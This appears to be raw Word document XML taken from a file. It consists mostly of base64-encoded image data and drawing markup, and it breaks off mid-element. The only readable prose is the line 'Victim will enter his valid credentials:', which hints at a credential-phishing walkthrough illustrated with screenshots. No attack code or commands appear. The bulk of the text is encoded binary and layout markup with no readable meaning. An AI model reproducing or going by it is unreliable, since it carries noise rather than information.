UUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRR&#10;QAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFA&#10;BRRRQAUUUUAFcb8V/wDkV7H/ALD2i/8Apzta7KuN+K//ACK9j/2HtF/9OdrXRh/40fX/ADMqv8OX&#10;9djktW+P6aHoF1q13pO6G113U9JliimzJ5dnFcymRQQAWYW/3TgDf14rP1H9qnSNLvryxn8Oav8A&#10;bbCCK7vYkaAiCGVrcRPu8zDbjcpwuSNrZ6DNrWr34a+Ktb8V6fdaOtpcPDeadqPiL7EkaRN5OyYG&#10;c8owRsb3AVsYBbGKoal8OfhF4tfw9YWupaPAA22G2sPsvmXjLLESC2wyA7rdVO1lzgjqBjnNTUsP&#10;2lNIu38OGbRdStYdbhjnikPlyeQku/yjKEY7N+xsZxnHGcHGNL+1Rb6bqX2e+8L6xM90i3NjZ6ba&#10;m7uGthBDK8riMsP+W8YC8HnHbNdLOPAreLptJ/4QuOU+HEt45tU+x26WmnIsfnRAuzggIrZBVSFy&#10;feqP9qfBKxvbLTFXwxG80ct/Ftii8tREYYmYtjCn99CoBOSCMAgUAT+If2g7PSPHml+HrPSLzU1v&#10;raUhxG1vILhbu2t1jCzKgKE3OS4OPl4zVC6/an8P2Nkt5caPqsNu9iLuMuiBp3OR5MS7syuGG07M&#10;4PJ45rpdO8YfD/x145ktQdLvfEGlmOG0nmEbySI8cN0DA3JK/wCrbjvHn+HNYNxqXwzi8UXGjX3h&#10;GG2jhuTpB1K40yP7CZmhEhh3jOzKSEZcKCSVBJOCAT6f+0RaalpWoX6eFdet4dLtpbnUEvYFtpLc&#10;KZguElKs4fyHIZQRgrnvih4u/aH8L6RrF19s8OX2pT6BHPei5jgikaArDagmLLbt7jUIoht5O58/&#10;L12oLz4P79OEUvhUyMJILRVMJZgSC6qOpGZxn/rsP73M3he1+Fmt+ErrWtKsNAGhXNg8t3O9tHHG&#10;bWRV3mXcBhCsCZ3dolz90UAYetftI2tt4HbV7XQtVstU+2Q2v9n6zp11AFD3aW5k3LE24fvNwC5Z&#10;h0HXGTpH7V1s5hgvvC+r3k8tzOkc2h2U9zHJbxPFG1wEaNZABJKyFWUHMT4yNuet0Dx78MbyOfw9&#10;Z3Wi29nY6jHHBbM0SxTXGIbhZIhnkh5o/m6+YPXFPn1H4R3d9NqEtx4Vku7UXOqyXDNBujWLy2uL&#10;gn0X9yXbp9wntQBW0P8AaE0vWte07TDo+oWf9o+S9pcTNEUkilju5EkO1yVytlJwRkbl98c5of7X&#10;mh+JbOa70vwn4pvbRId63MOmu8RcGIOhcZAKmbk5PEbkdBnX07SPg1ceKryW1ufDdxe3xht3sEeF&#10;k86KW4VWCDo++WZCfXK9c1YW5+ClhGXWTwhbJcRGPKmBA8cYjJ/4CoEJz0ACHsKAMWX9qnT7YXlx&#10;L4eu20uB7df7QhvLd7dBJbmYtLLvEcSrjbuZwu44JFd/8Q/Hd/4M+G2s+KLfSEuZ9OhluDZ3N0ED&#10;RITlg6Bxyo3Ae4BxzWd4f8G/DLx5pNxPpnh7RNRsI5pdOlxYpsLQM8TxkFeQDvHoQe4NdVq3gjw/&#10;r2gSaHqOjWV9o8jM72E8KtCxZizEoeDksT+JoA2kbeit6jNOqCysoNNs4bW1iSC2hQJHEgwqKOAA&#10;PSp6ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAo&#10;oooAKKKKACiiigAooooAKKKKACiiigArl9P/AOSna/8A9gfTf/R19XUVy+n/APJTtf8A+wPpv/o6&#10;+reltP0/VGc94+v+Z1FFFFYGgUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUU&#10;UAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQ&#10;AUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABXG/Ff/kV7H/sPaL/&#10;AOnO1rsq434r/wDIr2P/AGHtF/8ATna10Yf+NH1/zMqv8OX9djj/ABl8BfDPxE1zUU1jXZbuWdZv&#10;9DVbYTRiRcFWcR+ZJGuQRHIWXhcg4FaPhn4A6P4TuxLpt69nBcKqajZWlhaW9vfqskjoHjjhAXBm&#10;cErgsD8xOM1x3i/4MeM9TvfEyaBNp2hpqk15Mb1bjfI/moQAhMPmQO3yhmWQqPmKpyAJvCfwW8S6&#10;Jr2n3VwwmtY3324l1qVm0f8A0iWSTyEWJEkWRZEGwgKojC/MnFc5qb2pfs//AAw1G88TWF3pulm5&#10;16y/s5rdViSa1gNt9nMcGBuQFCTx3JNU/wDhl/w7DNor2upS6ZfaZ5slvJp1laWwZzLaSiRo44gr&#10;FXs4eSOQSDnIw/U/gn4hvL/4g31p4oax1TW7NYNN1EW0DSwzCy8hZ2PlgqVk+YBCBwK4i7/Zy8Uv&#10;f6Ff262a/ZIp4buyn1FiJY2uNPkMKOkK7I5FtbhWAHWYk7t7igD1C0+D/hrU7/UI73UT4huF1GK8&#10;1G3uvJkDTCwFsEljVQFDROH2kDqCOOKo6t8DPDurya1a3+u3DeG729WefQo2hit4pzbpAi7lUOAF&#10;CELu6kewrH8L/AvV9G8TPrkdxFo97NfwyNLa3klw8Voum/ZzCDKCHxMqNhhghFPUADG8Ufs7eJ9Y&#10;8YaxdQapaNomq6zaa3dRSuwkkuLX7OsLYC7fmVZGYesMOOCcAHRJ+zB4a0vS9Nih1FtKj0yX7QLq&#10;wsLKylAAiyfNihVl+WEBmBG4EhsgLjpbb4Q6TqnwivvAlzq11q3hfUtIbS0dWjV1tnjZMpIijJ2M&#10;MMc/dB7nPnd58DfFtxpV5bSCyu0lMazWsupTBL2QRXqNdO2wlXLXFu2MEjyBg/KuND4efBTxL4W8&#10;Upf6tcDVYY4kjUrqbJGyj7LsRovKyfKMLlCX9cAea9AGsP2ZtKl1vVtVuvEGrXd3rTwnVS4gUXiR&#10;eSY0wsY2AGEcpgnc2SeMV9d/Ze0rXNCi0y58TaxHb2+j3vh+F0EAMWnXMcaSw/6vk4hjIc5b5evJ&#10;q98R/hX4h8Q65qWsaHfQWuoyNELWWe4lQRRra3Ebr8mCoaSWMnaQTsBzlVxw3hX9n/x3pWqlZ9bj&#10;h0C51FXudMW+kkAtFjtpEVCEUBhcW8u5QAHW6kJORyAeg6R8AvDSWMBt7+6u7VyJVcSIVkU38l9w&#10;yryC8pXI/hx35rG0z9lDwlpemf2bbXD28aaTeaQPslpa27+RcwxwlnMcSl3VYhh2yck5zXmlx8J/&#10;Hlz42j0hLe6nkhgJudXlu7mK2mg+x2sX2cNt2N86TlfvEFmLKAzbuisPgL40j09Y7wafNMrosjpe&#10;AvPbJc3ckduWaAgIq3EOBt2gwAADggA948E+DoPA+k3GnW11PdW8l7cXi+eFzGZpWlZAQBkBnbGe&#10;eetdBWX4W0yfRvDWlWFzNJcXFraxwySzTec7MqgElyF3Hj72BnritSgAooooAKKKKACiiigAoooo&#10;AKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA&#10;ooooAKKKKACuX0//AJKdr/8A2B9N/wDR19XUVy+n/wDJTtf/AOwPpv8A6Ovq3pbT9P1RnPePr/md&#10;RRRRWBoFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFA&#10;BRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAF&#10;FFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAVxvxX/AORXsf8AsPaL/wCnO1rsq434r/8A&#10;Ir2P/Ye0X/052tdGH/jR9f8AMyq/w5f12PGPGPiT4jeG/Hvim48Nadr3iW8EV1Jb295Dd29jbgID&#10;EgHlvbzrkcNCwmywDI3ONjwB8Rvihql1pyeI9INm92Gexjs9JvGgucSyhkuppYImtCqLEQzxLu3k&#10;qrkbaveKf2gNQ8CaxrVxrdnanQ7aa5gsobKJ5ZbtolyAs6uyByVfdEyIV2nlsc7Hhn48T+IdTFlJ&#10;4Uu9Nkttp1AXdwI3jDyyxxNAjKHnDGFjjCsMgbSxxXOanE6mnxdk8Y+M9et/C6XN1p9ikum2X/CX&#10;30VkbsWW4QxQC2SK6RpsAu5Q5J4G2sW3+J/xme58O6nf6TeQafcQ3aXcGm6LeXPkqtxYDzXSS1hl&#10;8xY3vCieWA+z5fMI57fV/j/faV4i8Y3U0EsPhfwzZrfzQjw9eSXc0Qs/tDgy71SJ+oCumenrVS4/&#10;ae1K217QrCbwY9quqwyiP7TdtEzT/aLKGIDdEMRk3q7nIBGxsBuNwBJoOsfEe28SavqNja3Orwah&#10;qVvFBYa1azafCY/7KV/NL7JGt185ArYRgGZgRuOBy3xQ1v4g6X4l8Sy6Xp3iLWL2XTbl00+1hvvs&#10;VowsSUjjYR+RdK0y8FDFcbnAwQCK73RPjnqZ8X6tZ6tof/EoS+hsYJtPl+1TRStpy3TJsjUmUZEo&#10;3Kc/dG3qRb1P42XdjBfyR6fHPLb+Io9Jjs8GOeSFrdJidrEYkwx64Axz3oA4Xw38Rfi6vi7RtHk0&#10;mWfTH1CeO9v9U028hdYlvJg4Ty7RoyFtxCUZ5Y1ctgF+cei+PfGHijSZvCn9k22oPpt9byG5vbfR&#10;JLqcXP7ryIpIAVMKOGmLO+0IUALLmuZ0v9qQaprFvpUfg/UZNRR4hqNvA7M9ksjoiFg0anOH3EME&#10;+UZUtuXd6P4C8a6h478JWmuJo8enrfWa3dpDLeBy27JQPhflyApJGep9KAPNZfHXxNs7nR4XsLqa&#10;6vorOZI00OVoQXmYXaTSDiExRBGUOVLkkDPQYnhf4vfFK91Dwut/4c1I29zfGyvwNDuocnMP71Ge&#10;BdkADS7mmEJGDs83b83Y2PxQ8Y28ui/2lY6S1nea+mkvexxT24lQxtuMMchJO2RWXexAYLkLhhj2&#10;SgD50+JHxC+KdjeXum/8Io7vPpUksdvoUF1fwRTASYDXXkRBgQseArK4ZtvlsPnqTwr8QPinJ458&#10;O6NPpUk+jSyOt/qGp6fd28nyzzCQLttGiwqLFsZ5Yw+7K7+30PRQAUUUUAFFFFABRRRQAUUUUAFF&#10;FFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUU&#10;UAFFFFABRRRQAVy+n/8AJTtf/wCwPpv/AKOvq6iuX0//AJKdr/8A2B9N/wDR19W9Lafp+qM57x9f&#10;8zqKKKKwNAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAoo&#10;ooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiii&#10;gAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACuN+K/8AyK9j/wBh7Rf/AE52tdlXG/Ff&#10;/kV7H/sPaL/6c7WujD/xo+v+ZlV/hy/rscPf/Fb4a2OsatcatoMVhGt3e6ddavcWMLrLJCreeGCF&#10;pCpCNyy4OMdxm3pfxL+FCXlmFh07Trq0u3tbctpbIbWQy7BuPl/6OZJTtUPtLPkDLZFX4/hz8O76&#10;x1/SobmwkufEWoXgup4p4TdvcFzJPCrgZyhU5TkqBz0rF1T4Q/DZrjXNQu/ERt7O71X7Rq8LanEl&#10;vNdQzNepHLkZUxPuk2gqdud25a5zUtP+0b8NIdVjgkuZI49YRZTfNpc4hlj2cSTOYwFj2gYd/lKk&#10;HO3mt3T7n4b6tpWrzWunaXPpmh/aUu5RpmIIdjslwqsY9r4e2IYJnmMZ7V5Jq938BLi1S9svip4O&#10;aeGxGjx/bvEdnLaSRi3a2MUqh/myjHIBByByOQfRPBV98OIPDrfD6x8daNrBh0ZLO50yHVrd5hD5&#10;RMk5RWLgyLLvZ2JzlW7kkA1m8eeBNBuRb2llPLLbyxkjSPD91dCGQ28ZjLGCFgh8mVACcfKcdiBB&#10;4V8WeC/iH4nkeDQFGoT288tvf31hGrXsEcht5WRuW2hsKQwBIdeMGqHgD4d/DXxFZXt/pupWHj9J&#10;rlPM1CW6gvRHJHBFCEDRAKuEhjyAO2T1q94T+GPhzQ/EN1L4d16c3mmzeS9kLmOcafFJL9oktQmM&#10;xrIzK2Gy2AoUhQBQBtaLofg/UNX1Gzs9A0tbnQbpImK2cYMMrxRTAr8vB2tGcj0HpXUWel2enKi2&#10;tpBbKkawqIYwoVFztUY7DJwO2ap6R4Zs9E1bXdRtzIbjWbmO6ud7ZXekEcI2jHA2RL685rWoAx9R&#10;8H6Dq8dpHfaLp95HaOZLdZ7ZHELE5LJkfKSecitcDApaKACiiigAooooAKKKKACiiigAooooAKKK&#10;KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAoooo&#10;AKKKKACiiigArl9P/wCSna//ANgfTf8A0dfV1Fcvp/8AyU7X/wDsD6b/AOjr6t6W0/T9UZz3j6/5&#10;nUUUUVgaBRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRR&#10;QAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFA&#10;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&#10;L2zlIVmAYMMiSXhxUhDF0Rxknsn/FfI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ptSlZbgMAAGwIAAAOAAAAAAAAAAAAAAAAADwCAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItAAoAAAAAAAAAIQCJzY7v6tkAAOrZAAAVAAAAAAAAAAAAAAAAANYFAABkcnMvbWVkaWEvaW1h&#10;Z2UxLmpwZWdQSwECLQAUAAYACAAAACEAEJo+r+EAAAAKAQAADwAAAAAAAAAAAAAAAADz3wAAZHJz&#10;L2Rvd25yZXYueG1sUEsBAi0AFAAGAAgAAAAhAFhgsxu6AAAAIgEAABkAAAAAAAAAAAAAAAAAAeEA&#10;AGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB9AQAA8uEAAAAA&#10;">
                <v:shape id="Image 20" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:95;width:43243;height:2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9vwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0P+A/hCu7G1IIyVGMZBgoqiPjA9aW505ZpbkoS2/r3ZjHg8nDem3w0rejJ+caygsU8AUFcWt1w&#10;peB2LT6/QPiArLG1TAqe5CHfTj42mGk78Jn6S6hEDGGfoYI6hC6T0pc1GfRz2xFH7tc6gyFCV0nt&#10;cIjhppVpkqykwYZjQ40d/dRU/l0eRoHviqsrDnq/1M/j/ZieBjSuUmo2Hb/XIAKN4S3+d++0gjSu&#10;j1/iD5DbFwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA/vXo9vwAAANsAAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;">
                  <v:imagedata r:id="rId23" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 21" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:43339;height:21108;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4333875,211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SslxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gq91Y2BqkQ3UgWhlFKoltDjI/vMhmTfxuxWo7++WxA8DjPzDbNcDbYVJ+p97VjBZJyA&#10;IC6drrlS8L3fPs9B+ICssXVMCi7kYZWPHpaYaXfmLzrtQiUihH2GCkwIXSalLw1Z9GPXEUfv4HqL&#10;Icq+krrHc4TbVqZJMpUWa44LBjvaGCqb3a9V4JorHT8/ik35vk4NXkw6+3kplHp6HF4XIAIN4R6+&#10;td+0gnQC/1/iD5D5HwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCp7SslxQAAANsAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,2110740r4333875,l4333875,,,,,2110740xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="789DB240" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>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4CC3C48" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="601"/>
        </w:tabs>
        <w:spacing w:before="188"/>
        <w:ind w:left="601" w:hanging="241"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>his</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3179E3" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="19"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487590912" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79A36788" wp14:editId="0CC7D381">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>906780</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>154380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3856354" cy="176657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6354" cy="1766570"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3856354" cy="1766570"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="23" name="Image 23"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId24" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9588"/>
                            <a:ext cx="3837304" cy="1747520"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="24" name="Graphic 24"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="3846829" cy="1757045"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3846829" h="1757045">
                                <a:moveTo>
                                  <a:pt x="0" y="1757045"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3846829" y="1757045"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3846829" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
